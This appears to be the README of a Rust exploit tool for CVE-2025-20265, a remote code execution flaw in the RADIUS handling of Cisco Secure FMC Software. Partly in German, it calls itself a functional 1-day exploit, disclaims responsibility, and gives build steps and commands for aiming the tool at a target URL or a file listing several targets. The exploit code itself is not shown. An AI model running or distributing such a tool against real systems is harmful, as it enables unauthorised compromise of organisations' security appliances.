
PoC for CVE-2025-20265 Cisco Secure FMC Software RADIUS Remote Code Execution Vulnerability
Dies ist ein funktionaler Exploit für eine 1-Tage-Schwachstelle.
Verwendung auf eigene Gefahr. Sie sind für Ihre Handlungen verantwortlich.
cargo build --release
$ ./target/release/cve_2025_20265 --help
# or
$ cargo run --release -- --help
Zum Debuggen verwenden Sie die Umgebungsvariable RUST_LOG:
RUST_LOG=debug cargo run --release -- --help
# use either the build or the path to the executable file
$ alias EXE="cargo run --release"
# or
$ cargo build --release
$ alias EXE="./target/release/cve_2025_20265"
# check the target
$ EXE https://10.10.10.1:4443/
# read targets from the file
$ echo -e "https://10.10.10.1:4443\nhttp://127.0.0.1\nhttp://10.10.10.10" > targets.txt
$ EXE --from-file targets.txt